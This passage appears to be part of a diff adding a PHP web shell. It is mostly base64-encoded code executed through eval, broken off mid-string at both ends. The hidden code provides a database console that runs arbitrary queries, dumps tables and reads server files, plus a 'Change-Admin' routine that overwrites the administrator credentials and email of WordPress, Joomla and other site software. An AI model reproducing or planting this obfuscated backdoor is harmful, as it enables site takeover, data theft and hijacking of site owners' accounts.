LmJhY2soLTEpPC9zY3JpcHQ+Jyk7IAl9ICAJZWNobyAiIDxkaXYgY2xhc3M9Y29udGVudD4gPGZvcm0gbmFtZT0nc2YnIG1ldGhvZD0ncG9zdCcgb25zdWJtaXQ9J2ZzKHRoaXMpOyc+PHRhYmxlIGNlbGxwYWRkaW5nPScyJyBjZWxsc3BhY2luZz0nMCc+PHRyPiA8dGQ+VHlwZTwvdGQ+PHRkPkhvc3Q8L3RkPjx0ZD5Mb2dpbjwvdGQ+PHRkPlBhc3N3b3JkPC90ZD48dGQ+RGF0YWJhc2U8L3RkPjx0ZD48L3RkPjwvdHI+PHRyPiA8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hIHZhbHVlPVNxbD48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1wMSB2YWx1ZT0ncXVlcnknPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPXAyIHZhbHVlPScnPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWMgdmFsdWU9JyIuIGh0bWxzcGVjaWFsY2hhcnMoJEdMT0JBTFNbJ2N3ZCddKSAuIic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9Y2hhcnNldCB2YWx1ZT0nIi4gKGlzc2V0KCRfUE9TVFsnY2hhcnNldCddKT8kX1BPU1RbJ2NoYXJzZXQnXTonJykgLiInPiA8dGQ+PHNlbGVjdCBuYW1lPSd0eXBlJz48b3B0aW9uIHZhbHVlPSdteXNxbCcgIjsgICAgIGlmKEAkX1BPU1RbJ3R5cGUnXT09J215c3FsJyllY2hvICdzZWxlY3RlZCc7IGVjaG8gIj5NeVNxbDwvb3B0aW9uPjxvcHRpb24gdmFsdWU9J3Bnc3FsJyAiOyBpZihAJF9QT1NUWyd0eXBlJ109PSdwZ3NxbCcpZWNobyAnc2VsZWN0ZWQnOyBlY2hvICI+UG9zdGdyZVNxbDwvb3B0aW9uPjwvc2VsZWN0PjwvdGQ+IDx0ZD48aW5wdXQgdHlwZT10ZXh0IG5hbWU9c3FsX2hvc3QgdmFsdWU9JyIuIChlbXB0eSgkX1BPU1RbJ3NxbF9ob3N0J10pPydsb2NhbGhvc3QnOmh0bWxzcGVjaWFsY2hhcnMoJF9QT1NUWydzcWxfaG9zdCddKSkgLiInPjwvdGQ+IDx0ZD48aW5wdXQgdHlwZT10ZXh0IG5hbWU9c3FsX2xvZ2luIHZhbHVlPSciLiAoZW1wdHkoJF9QT1NUWydzcWxfbG9naW4nXSk/J3Jvb3QnOmh0bWxzcGVjaWFsY2hhcnMoJF9QT1NUWydzcWxfbG9naW4nXSkpIC4iJz48L3RkPiA8dGQ+PGlucHV0IHR5cGU9dGV4dCBuYW1lPXNxbF9wYXNzIHZhbHVlPSciLiAoZW1wdHkoJF9QT1NUWydzcWxfcGFzcyddKT8nJzpodG1sc3BlY2lhbGNoYXJzKCRfUE9TVFsnc3FsX3Bhc3MnXSkpIC4iJz48L3RkPjx0ZD4iOyAJJHRtcCA9ICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9c3FsX2Jhc2UgdmFsdWU9Jyc+IjsgCWlmKGlzc2V0KCRfUE9TVFsnc3FsX2hvc3QnXSkpeyAJCWlmKCRkYi0+Y29ubmVjdCgkX1BPU1RbJ3NxbF9ob3N0J10sICRfUE9TVFsnc3FsX2xvZ2luJ10sICRfUE9TVFsnc3FsX3Bhc3MnXSwgJF9QT1NUWydzcWxfYmFzZSddKSkgeyAJCQlzd2l0Y2goJF9QT1NUWydjaGFyc2V0J10pIHsgCQkJCWNhc2UgIldpbmRvd3MtMTI1MSI6ICRkYi0+c2V0Q2hhcnNldCgnY3AxMjUxJyk7IGJyZWFrOyAJCQkJY2FzZSAiVVRGLTgiOiAkZGItPnNldENoYXJzZXQoJ3V0ZjgnKTsgYnJlYWs7IAkJCQljYXNlICJLT0k4LVIiOiAkZGItPnNldENoYXJzZXQoJ2tvaThyJyk7IGJyZWFrOyAJCQkJY2FzZSAiS09JOC1VIjogJGRiLT5zZXRDaGFyc2V0KCdrb2k4dScpOyBicmVhazsgCQkJCWNhc2UgImNwODY2IjogJGRiLT5zZXRDaGFyc2V0KCdjcDg2NicpOyBicmVhazsgCQkJfSAJCQkkZGItPmxpc3REYnMoKTsgCQkJZWNobyAiPHNlbGVjdCBuYW1lPXNxbF9iYXNlPjxvcHRpb24gdmFsdWU9Jyc+PC9vcHRpb24+IjsgCQkJd2hpbGUoJGl0ZW0gPSAkZGItPmZldGNoKCkpIHsgCQkJCWxpc3QoJGtleSwgJHZhbHVlKSA9IGVhY2goJGl0ZW0pOyAJCQkJZWNobyAnPG9wdGlvbiB2YWx1ZT0iJy4kdmFsdWUuJyIgJy4oJHZhbHVlPT0kX1BPU1RbJ3NxbF9iYXNlJ10/J3NlbGVjdGVkJzonJykuJz4nLiR2YWx1ZS4nPC9vcHRpb24+JzsgCQkJfSAJCQllY2hvICc8L3NlbGVjdD4nOyAJCX0gCQllbHNlIGVjaG8gJHRtcDsgCX1lbHNlIAkJZWNobyAkdG1wOyAJZWNobyAiPC90ZD4gCQkJCTx0ZD48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9Jz4+JyBvbmNsaWNrPSdmcyhkLnNmKTsnPjwvdGQ+ICAgICAgICAgICAgICAgICA8dGQ+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1zcWxfY291bnQgdmFsdWU9J29uJyIgLiAoZW1wdHkoJF9QT1NUWydzcWxfY291bnQnXSk/Jyc6JyBjaGVja2VkJykgLiAiPiBjb3VudCB0aGUgbnVtYmVyIG9mIHJvd3M8L3RkPiAJCQk8L3RyPiAJCTwvdGFibGU+IAkJPHNjcmlwdD4gICAgICAgICAgICAgc19kYj0nIi5AYWRkc2xhc2hlcygkX1BPU1RbJ3NxbF9iYXNlJ10pLiInOyAgICAgICAgICAgICBmdW5jdGlvbiBmcyhmKSB7ICAgICAgICAgICAgICAgICBpZihmLnNxbF9iYXNlLnZhbHVlIT1zX2RiKSB7IGYub25zdWJtaXQgPSBmdW5jdGlvbigpIHt9OyAgICAgICAgICAgICAgICAgICAgIGlmKGYucDEpIGYucDEudmFsdWU9Jyc7ICAgICAgICAgICAgICAgICAgICAgaWYoZi5wMikgZi5wMi52YWx1ZT0nJzsgICAgICAgICAgICAgICAgICAgICBpZihmLnAzKSBmLnAzLnZhbHVlPScnOyAgICAgICAgICAgICAgICAgfSAgICAgICAgICAgICB9IAkJCWZ1bmN0aW9uIHN0KHQsbCkgeyAJCQkJZC5zZi5wMS52YWx1ZSA9ICdzZWxlY3QnOyAJCQkJZC5zZi5wMi52YWx1ZSA9IHQ7ICAgICAgICAgICAgICAgICBpZihsICYmIGQuc2YucDMpIGQuc2YucDMudmFsdWUgPSBsOyAJCQkJZC5zZi5zdWJtaXQoKTsgCQkJfSAJCQlmdW5jdGlvbiBpcygpIHsgCQkJCWZvcihpPTA7aTxkLnNmLmVsZW1lbnRzWyd0YmxbXSddLmxlbmd0aDsrK2kpIAkJCQkJZC5zZi5lbGVtZW50c1sndGJsW10nXVtpXS5jaGVja2VkID0gIWQuc2YuZWxlbWVudHNbJ3RibFtdJ11baV0uY2hlY2tlZDsgCQkJfSAJCTwvc2NyaXB0PiI7IAlpZihpc3NldCgkZGIpICYmICRkYi0+bGluayl7IAkJZWNobyAiPGJyLz48dGFibGUgd2lkdGg9MTAwJSBjZWxscGFkZGluZz0yIGNlbGxzcGFjaW5nPTA+IjsgCQkJaWYoIWVtcHR5KCRfUE9TVFsnc3FsX2Jhc2UnXSkpeyAJCQkJJGRiLT5zZWxlY3RkYigkX1BPU1RbJ3NxbF9iYXNlJ10pOyAJCQkJZWNobyAiPHRyPjx0ZCB3aWR0aD0xIHN0eWxlPSdib3JkZXItdG9wOjJweCBzb2xpZCAjNjY2Oyc+PHNwYW4+VGFibGVzOjwvc3Bhbj48YnI+PGJyPiI7IAkJCQkkdGJsc19yZXMgPSAkZGItPmxpc3RUYWJsZXMoKTsgCQkJCXdoaWxlKCRpdGVtID0gJGRiLT5mZXRjaCgkdGJsc19yZXMpKSB7IAkJCQkJbGlzdCgka2V5LCAkdmFsdWUpID0gZWFjaCgkaXRlbSk7ICAgICAgICAgICAgICAgICAgICAgaWYoIWVtcHR5KCRfUE9TVFsnc3FsX2NvdW50J10pKSAgICAgICAgICAgICAgICAgICAgICAgICAkbiA9ICRkYi0+ZmV0Y2goJGRiLT5xdWVyeSgnU0VMRUNUIENPVU5UKCopIGFzIG4gRlJPTSAnLiR2YWx1ZS4nJykpOyAJCQkJCSR2YWx1ZSA9IGh0bWxzcGVjaWFsY2hhcnMoJHZhbHVlKTsgCQkJCQllY2hvICI8bm9icj48aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J3RibFtdJyB2YWx1ZT0nIi4kdmFsdWUuIic+Jm5ic3A7PGEgaHJlZj0jIG9uY2xpY2s9XCJzdCgnIi4kdmFsdWUuIicsMSlcIj4iLiR2YWx1ZS4iPC9hPiIgLiAoZW1wdHkoJF9QT1NUWydzcWxfY291bnQnXSk/JyZuYnNwOyc6IiA8c21hbGw+KHskblsnbiddfSk8L3NtYWxsPiIpIC4gIjwvbm9icj48YnI+IjsgCQkJCX0gCQkJCWVjaG8gIjxpbnB1dCB0eXBlPSdjaGVja2JveCcgb25jbGljaz0naXMoKTsnPiA8aW5wdXQgdHlwZT1idXR0b24gdmFsdWU9J0R1bXAnIG9uY2xpY2s9J2RvY3VtZW50LnNmLnAyLnZhbHVlPVwiZG93bmxvYWRcIjtkb2N1bWVudC5zZi5zdWJtaXQoKTsnPjxicj5GaWxlIHBhdGg6PGlucHV0IHR5cGU9dGV4dCBuYW1lPWZpbGUgdmFsdWU9J2R1bXAuc3FsJz48L3RkPjx0ZCBzdHlsZT0nYm9yZGVyLXRvcDoycHggc29saWQgIzY2NjsnPiI7IAkJCQlpZihAJF9QT1NUWydwMSddID09ICdzZWxlY3QnKSB7IAkJCQkJJF9QT1NUWydwMSddID0gJ3F1ZXJ5JzsgICAgICAgICAgICAgICAgICAgICAkX1BPU1RbJ3AzJ10gPSAkX1BPU1RbJ3AzJ10/JF9QT1NUWydwMyddOjE7IAkJCQkJJGRiLT5xdWVyeSgnU0VMRUNUIENPVU5UKCopIGFzIG4gRlJPTSAnIC4gJF9QT1NUWydwMiddKTsgCQkJCQkkbnVtID0gJGRiLT5mZXRjaCgpOyAJCQkJCSRwYWdlcyA9IGNlaWwoJG51bVsnbiddIC8gMzApOyAgICAgICAgICAgICAgICAgICAgIGVjaG8gIjxzY3JpcHQ+ZC5zZi5vbnN1Ym1pdD1mdW5jdGlvbigpe3N0KFwiIiAuICRfUE9TVFsncDInXSAuICJcIiwgZC5zZi5wMy52YWx1ZSl9PC9zY3JpcHQ+PHNwYW4+Ii4kX1BPU1RbJ3AyJ10uIjwvc3Bhbj4gKHskbnVtWyduJ119IHJlY29yZHMpIFBhZ2UgIyA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9J3AzJyB2YWx1ZT0iIC4gKChpbnQpJF9QT1NUWydwMyddKSAuICI+IjsgICAgICAgICAgICAgICAgICAgICBlY2hvICIgb2YgJHBhZ2VzIjsgICAgICAgICAgICAgICAgICAgICBpZigkX1BPU1RbJ3AzJ10gPiAxKSAgICAgICAgICAgICAgICAgICAgICAgICBlY2hvICIgPGEgaHJlZj0jIG9uY2xpY2s9J3N0KFwiIiAuICRfUE9TVFsncDInXSAuICciLCAnIC4gKCRfUE9TVFsncDMnXS0xKSAuICIpJz4mbHQ7IFByZXY8L2E+IjsgICAgICAgICAgICAgICAgICAgICBpZigkX1BPU1RbJ3AzJ10gPCAkcGFnZXMpICAgICAgICAgICAgICAgICAgICAgICAgIGVjaG8gIiA8YSBocmVmPSMgb25jbGljaz0nc3QoXCIiIC4gJF9QT1NUWydwMiddIC4gJyIsICcgLiAoJF9QT1NUWydwMyddKzEpIC4gIiknPk5leHQgJmd0OzwvYT4iOyAgICAgICAgICAgICAgICAgICAgICRfUE9TVFsncDMnXS0tOyAJCQkJCWlmKCRfUE9TVFsndHlwZSddPT0ncGdzcWwnKSAJCQkJCQkkX1BPU1RbJ3AyJ10gPSAnU0VMRUNUICogRlJPTSAnLiRfUE9TVFsncDInXS4nIExJTUlUIDMwIE9GRlNFVCAnLigkX1BPU1RbJ3AzJ10qMzApOyAJCQkJCWVsc2UgCQkJCQkJJF9QT1NUWydwMiddID0gJ1NFTEVDVCAqIEZST00gYCcuJF9QT1NUWydwMiddLidgIExJTUlUICcuKCRfUE9TVFsncDMnXSozMCkuJywzMCc7IAkJCQkJZWNobyAiPGJyPjxicj4iOyAJCQkJfSAJCQkJaWYoKEAkX1BPU1RbJ3AxJ10gPT0gJ3F1ZXJ5JykgJiYgIWVtcHR5KCRfUE9TVFsncDInXSkpIHsgCQkJCQkkZGItPnF1ZXJ5KEAkX1BPU1RbJ3AyJ10pOyAJCQkJCWlmKCRkYi0+cmVzICE9PSBmYWxzZSkgeyAJCQkJCQkkdGl0bGUgPSBmYWxzZTsgCQkJCQkJZWNobyAnPHRhYmxlIHdpZHRoPTEwMCUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz0yIGNsYXNzPW1haW4gPic7IAkJCQkJCSRsaW5lID0gMTsgCQkJCQkJd2hpbGUoJGl0ZW0gPSAkZGItPmZldGNoKCkpCXsgCQkJCQkJCWlmKCEkdGl0bGUpCXsgCQkJCQkJCQllY2hvICc8dHI+JzsgCQkJCQkJCQlmb3JlYWNoKCRpdGVtIGFzICRrZXkgPT4gJHZhbHVlKSAJCQkJCQkJCQllY2hvICc8dGg+Jy4ka2V5Lic8L3RoPic7IAkJCQkJCQkJcmVzZXQoJGl0ZW0pOyAJCQkJCQkJCSR0aXRsZT10cnVlOyAJCQkJCQkJCWVjaG8gJzwvdHI+PHRyPic7IAkJCQkJCQkJJGxpbmUgPSAyOyAJCQkJCQkJfSAJCQkJCQkJZWNobyAnPHRyIGNsYXNzPSJsJy4kbGluZS4nIj4nOyAJCQkJCQkJJGxpbmUgPSAkbGluZT09MT8yOjE7IAkJCQkJCQlmb3JlYWNoKCRpdGVtIGFzICRrZXkgPT4gJHZhbHVlKSB7IAkJCQkJCQkJaWYoJHZhbHVlID09IG51bGwpIAkJCQkJCQkJCWVjaG8gJzx0ZD48aT5udWxsPC9pPjwvdGQ+JzsgCQkJCQkJCQllbHNlIAkJCQkJCQkJCWVjaG8gJzx0ZD4nLm5sMmJyKGh0bWxzcGVjaWFsY2hhcnMoJHZhbHVlKSkuJzwvdGQ+JzsgCQkJCQkJCX0gCQkJCQkJCWVjaG8gJzwvdHI+JzsgCQkJCQkJfSAJCQkJCQllY2hvICc8L3RhYmxlPic7IAkJCQkJfSBlbHNlIHsgCQkJCQkJZWNobyAnPGRpdj48Yj5FcnJvcjo8L2I+ICcuaHRtbHNwZWNpYWxjaGFycygkZGItPmVycm9yKCkpLic8L2Rpdj4nOyAJCQkJCX0gCQkJCX0gCQkJCWVjaG8gIjxicj48L2Zvcm0+PGZvcm0gb25zdWJtaXQ9J2Quc2YucDEudmFsdWU9XCJxdWVyeVwiO2Quc2YucDIudmFsdWU9dGhpcy5xdWVyeS52YWx1ZTtkb2N1bWVudC5zZi5zdWJtaXQoKTtyZXR1cm4gZmFsc2U7Jz48dGV4dGFyZWEgbmFtZT0ncXVlcnknIHN0eWxlPSd3aWR0aDoxMDAlO2hlaWdodDoxMDBweCc+IjsgICAgICAgICAgICAgICAgIGlmKCFlbXB0eSgkX1BPU1RbJ3AyJ10pICYmICgkX1BPU1RbJ3AxJ10gIT0gJ2xvYWRmaWxlJykpICAgICAgICAgICAgICAgICAgICAgZWNobyBodG1sc3BlY2lhbGNoYXJzKCRfUE9TVFsncDInXSk7ICAgICAgICAgICAgICAgICBlY2hvICI8L3RleHRhcmVhPjxici8+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFeGVjdXRlJz4iOyAJCQkJZWNobyAiPC90ZD48L3RyPiI7IAkJCX0gCQkJZWNobyAiPC90YWJsZT48L2Zvcm0+PGJyLz4iOyAgICAgICAgICAgICBpZigkX1BPU1RbJ3R5cGUnXT09J215c3FsJykgeyAgICAgICAgICAgICAgICAgJGRiLT5xdWVyeSgiU0VMRUNUIDEgRlJPTSBteXNxbC51c2VyIFdIRVJFIGNvbmNhdChgdXNlcmAsICdAJywgYGhvc3RgKSA9IFVTRVIoKSBBTkQgYEZpbGVfcHJpdmAgPSAneSciKTsgICAgICAgICAgICAgICAgIGlmKCRkYi0+ZmV0Y2goKSkgICAgICAgICAgICAgICAgICAgICBlY2hvICI8Zm9ybSBvbnN1Ym1pdD0nZC5zZi5wMS52YWx1ZT1cImxvYWRmaWxlXCI7ZG9jdW1lbnQuc2YucDIudmFsdWU9dGhpcy5mLnZhbHVlO2RvY3VtZW50LnNmLnN1Ym1pdCgpO3JldHVybiBmYWxzZTsnPjxzcGFuPkxvYWQgZmlsZTwvc3Bhbj4gPGlucHV0ICBjbGFzcz0ndG9vbHNJbnAnIHR5cGU9dGV4dCBuYW1lPWY+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSc+Pic+PC9mb3JtPiI7ICAgICAgICAgICAgIH0gCQkJaWYoQCRfUE9TVFsncDEnXSA9PSAnbG9hZGZpbGUnKSB7IAkJCQkkZmlsZSA9ICRkYi0+bG9hZEZpbGUoJF9QT1NUWydwMiddKTsgCQkJCWVjaG8gJzxwcmUgY2xhc3M9bWwxPicuaHRtbHNwZWNpYWxjaGFycygkZmlsZVsnZmlsZSddKS4nPC9wcmU+JzsgCQkJfSAJfSBlbHNlIHsgICAgICAgICBlY2hvIGh0bWxzcGVjaWFsY2hhcnMoJGRiLT5lcnJvcigpKTsgICAgIH0gCWVjaG8gJzwvZGl2Pic7";
+eval(base64_decode($tkl));
+exit;
+case "Change-Admin":
+$tkl = "ZWNobyAnPGZvcm0gbWV0aG9kPSJQT1NUIj5TZWxlY3QgU2NyaXB0IFR5cGUgOiA8YnI+PHA+IAkJCTxzZWxlY3QgbmFtZT0iQ2hhbmdlLUFkbWluX3R5cGUiPiAJCQkJPG9wdGlvbiB2YWx1ZT0id3AiPldvcmRQcmVzczwvb3B0aW9uPiAJCQkJPG9wdGlvbiB2YWx1ZT0iam9vbSI+Sm9vbWxhPC9vcHRpb24+IAkJCQk8b3B0aW9uIHZhbHVlPSJhcmFiIj5hcmFiIHBvcnRhbDwvb3B0aW9uPiAJCQkJPG9wdGlvbiB2YWx1ZT0idmIiPnZCdWxsZXRpbjwvb3B0aW9uPiAJCQkJPG9wdGlvbiB2YWx1ZT0icGhwYmIiPnBocEJCPC9vcHRpb24+IAkJCQk8b3B0aW9uIHZhbHVlPSJ3aG1jcyI+d2htY3M8L29wdGlvbj4gCQkJCTxvcHRpb24gdmFsdWU9InplbmNhcnQiPlplbiBDYXJ0PC9vcHRpb24+IAkJCQkJCQkJPC9zZWxlY3Q+IAkJCTxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSI+PiIgLz4gCQkgCQkJPC9wPiAJCTwvZm9ybT4nOyAgIGlmICgkX1BPU1RbJ0NoYW5nZS1BZG1pbl90eXBlJ10gPT0gJ3dwJyl7IGVjaG8gJzxGT1JNIG1ldGhvZD0iUE9TVCI+IDo6OkRhdGFCYXNlIGluZm86Ojo8YnI+IGhvc3QgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0ibG9jYWxob3N0IiBuYW1lPSJsb2NhbGhvc3QiIHR5cGU9InRleHQiPiA8YnI+ZGF0YWJhc2UgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJkYXRhYmFzZSIgdHlwZT0idGV4dCI+PGJyPiA8YnI+VGFibGUgUHJlZml4IDo8YnI+IDxJTlBVVCBzaXplPSIxNSIgdmFsdWU9IndwXyIgbmFtZT0icHJlZml4IiB0eXBlPSJ0ZXh0Ij48YnI+IDxicj51c2VybmFtZSA6IDxicj48SU5QVVQgc2l6ZT0iMTUiIHZhbHVlPSIiIG5hbWU9InVzZXJuYW1lIiB0eXBlPSJ0ZXh0Ij4gPGJyPnBhc3N3b3JkIDogPGJyPjxJTlBVVCBzaXplPSIxNSIgdmFsdWU9IiIgbmFtZT0icGFzc3dvcmQiIHR5cGU9InBhc3N3b3JkIj48YnI+ICAgPGJyPjo6OldvcmRwcmVzcyBBZG1pbiBpbmZvOjo6IDxicj5OZXcgdXNlcm5hbWU6PGJyPiA8SU5QVVQgbmFtZT0iYWRtaW4iIHNpemU9IjE1IiB2YWx1ZT0iYWRtaW4iPjxicj4gTmV3IHBhc3N3b3JkOjxicj4gPElOUFVUIG5hbWU9InB3ZCIgc2l6ZT0iMTUiIHZhbHVlPSIxMjMxMjMiPjxicj4gTmV3IEVtYWlsOjxicj4gPElOUFVUIG5hbWU9ImVtYWlsIiBzaXplPSIxNSIgdmFsdWU9ImVtYWlsQHNpdGUuY29tIj48YnI+IDxJTlBVVCB2YWx1ZT0iY2hhbmdlIiBuYW1lPSJzZW5kIiB0eXBlPSJzdWJtaXQiPiA8L0ZPUk0+JzsgfSBpZiAoJF9QT1NUWydzZW5kJ10gPT0gJ2NoYW5nZScpeyAkbG9jYWxob3N0ID0gJF9QT1NUWydsb2NhbGhvc3QnXTsgJGRhdGFiYXNlICA9ICRfUE9TVFsnZGF0YWJhc2UnXTsgJHVzZXJuYW1lICA9ICRfUE9TVFsndXNlcm5hbWUnXTsgJHBhc3N3b3JkICA9ICRfUE9TVFsncGFzc3dvcmQnXTsgJHB3ZCAgID0gJF9QT1NUWydwd2QnXTsgJGFkbWluID0gJF9QT1NUWydhZG1pbiddOyAkU1FMID0gJF9QT1NUWydlbWFpbCddOyAkcHJlZml4ID0gJF9QT1NUWydwcmVmaXgnXTsgICBAbXlzcWxfY29ubmVjdCgkbG9jYWxob3N0LCR1c2VybmFtZSwkcGFzc3dvcmQpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgIEBteXNxbF9zZWxlY3RfZGIoJGRhdGFiYXNlKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICAkaGFzaCA9IGNyeXB0KCRwd2QpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFICIuJHByZWZpeC4idXNlcnMgU0VUIHVzZXJfbG9naW4gPSciLiRhZG1pbi4iJyBXSEVSRSBJRCA9IDEiKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgIi4kcHJlZml4LiJ1c2VycyBTRVQgdXNlcl9wYXNzID0nIi4kaGFzaC4iJyBXSEVSRSBJRCA9IDEiKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgIi4kcHJlZml4LiJ1c2VycyBTRVQgdXNlcl9sb2dpbiA9JyIuJGFkbWluLiInIFdIRVJFIElEID0gMiIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSAiLiRwcmVmaXguInVzZXJzIFNFVCB1c2VyX3Bhc3MgPSciLiRoYXNoLiInIFdIRVJFIElEID0gMiIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSAiLiRwcmVmaXguInVzZXJzIFNFVCB1c2VyX2xvZ2luID0nIi4kYWRtaW4uIicgV0hFUkUgSUQgPSAzIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFICIuJHByZWZpeC4idXNlcnMgU0VUIHVzZXJfcGFzcyA9JyIuJGhhc2guIicgV0hFUkUgSUQgPSAzIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFICIuJHByZWZpeC4idXNlcnMgU0VUIHVzZXJfZW1haWwgPSciLiRTUUwuIicgV0hFUkUgSUQgPSAxIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAgIGlmKCR0a2wpeyBlY2hvICI8Yj4gU3VjY2VzczwvYj4gIjsgfSAgfSBpZiAoJF9QT1NUWydDaGFuZ2UtQWRtaW5fdHlwZSddID09ICdqb29tJyl7IGVjaG8gJzxGT1JNIG1ldGhvZD0iUE9TVCI+IDo6OkRhdGFCYXNlIGluZm86Ojo8YnI+IGhvc3QgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0ibG9jYWxob3N0IiBuYW1lPSJsb2NhbGhvc3QiIHR5cGU9InRleHQiPiA8YnI+ZGF0YWJhc2UgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJkYXRhYmFzZSIgdHlwZT0idGV4dCI+PGJyPiA8YnI+VGFibGUgUHJlZml4IDo8YnI+IDxJTlBVVCBzaXplPSIxNSIgdmFsdWU9Impvc18iIG5hbWU9InByZWZpeCIgdHlwZT0idGV4dCI+PGJyPiA8YnI+dXNlcm5hbWUgOiA8YnI+PElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJ1c2VybmFtZSIgdHlwZT0idGV4dCI+IDxicj5wYXNzd29yZCA6IDxicj48SU5QVVQgc2l6ZT0iMTUiIHZhbHVlPSIiIG5hbWU9InBhc3N3b3JkIiB0eXBlPSJwYXNzd29yZCI+PGJyPiAgIDxicj46OjpKb29tbGEgQWRtaW4gaW5mbzo6OiA8YnI+TmV3IHVzZXJuYW1lOjxicj4gPElOUFVUIG5hbWU9ImFkbWluIiBzaXplPSIxNSIgdmFsdWU9ImFkbWluIj48YnI+IE5ldyBwYXNzd29yZDo8YnI+IDxJTlBVVCBuYW1lPSJwd2QiIHNpemU9IjE1IiB2YWx1ZT0iMTIzMTIzIj48YnI+IE5ldyBFbWFpbDo8YnI+IDxJTlBVVCBuYW1lPSJlbWFpbCIgc2l6ZT0iMTUiIHZhbHVlPSJlbWFpbEBzaXRlLmNvbSI+PGJyPiA8SU5QVVQgdmFsdWU9ImNoYW5nZS1qb29tbGEtYWRtaW4iIG5hbWU9InNlbmQiIHR5cGU9InN1Ym1pdCI+IDwvRk9STT4nOyB9IGlmICgkX1BPU1RbJ3NlbmQnXSA9PSAnY2hhbmdlLWpvb21sYS1hZG1pbicpeyAkbG9jYWxob3N0ID0gJF9QT1NUWydsb2NhbGhvc3QnXTsgJGRhdGFiYXNlICA9ICRfUE9TVFsnZGF0YWJhc2UnXTsgJHVzZXJuYW1lICA9ICRfUE9TVFsndXNlcm5hbWUnXTsgJHBhc3N3b3JkICA9ICRfUE9TVFsncGFzc3dvcmQnXTsgJHB3ZCAgID0gJF9QT1NUWydwd2QnXTsgJGFkbWluID0gJF9QT1NUWydhZG1pbiddOyAkU1FMID0gJF9QT1NUWydlbWFpbCddOyAkcHJlZml4ID0gJF9QT1NUWydwcmVmaXgnXTsgICBAbXlzcWxfY29ubmVjdCgkbG9jYWxob3N0LCR1c2VybmFtZSwkcGFzc3dvcmQpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgIEBteXNxbF9zZWxlY3RfZGIoJGRhdGFiYXNlKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICAkaGFzaCA9IG1kNSgkcHdkKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSAiLiRwcmVmaXguInVzZXJzIFNFVCB1c2VybmFtZSA9JyIuJGFkbWluLiInIFdIRVJFIHVzZXJuYW1lICA9ICdhZG1pbiciKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgIi4kcHJlZml4LiJ1c2VycyBTRVQgcGFzc3dvcmQgPSciLiRoYXNoLiInIFdIRVJFIHVzZXJuYW1lICA9ICdhZG1pbiciKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgIi4kcHJlZml4LiJ1c2VycyBTRVQgdXNlcm5hbWUgPSciLiRhZG1pbi4iJyBXSEVSRSB1c2VydHlwZSA9ICdkZXByZWNhdGVkJyIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSAiLiRwcmVmaXguInVzZXJzIFNFVCBwYXNzd29yZCA9JyIuJGhhc2guIicgV0hFUkUgdXNlcnR5cGUgPSAnZGVwcmVjYXRlZCciKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgIi4kcHJlZml4LiJ1c2VycyBTRVQgdXNlcm5hbWUgPSciLiRhZG1pbi4iJyBXSEVSRSB1c2VydHlwZSA9ICdTdXBlciBBZG1pbmlzdHJhdG9yJyIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSAiLiRwcmVmaXguInVzZXJzIFNFVCBwYXNzd29yZCA9JyIuJGhhc2guIicgV0hFUkUgdXNlcnR5cGUgPSAnU3VwZXIgQWRtaW5pc3RyYXRvciciKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgIi4kcHJlZml4LiJ1c2VycyBTRVQgZW1haWwgPSciLiRTUUwuIicgV0hFUkUgdXNlcm5hbWUgPSAnYWRtaW4nIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAgIGlmKCR0a2wpeyBlY2hvICI8Yj4gU3VjY2VzczwvYj4gIjsgfSAgfSAgICAgaWYgKCRfUE9TVFsnQ2hhbmdlLUFkbWluX3R5cGUnXSA9PSAnYXJhYicpeyBlY2h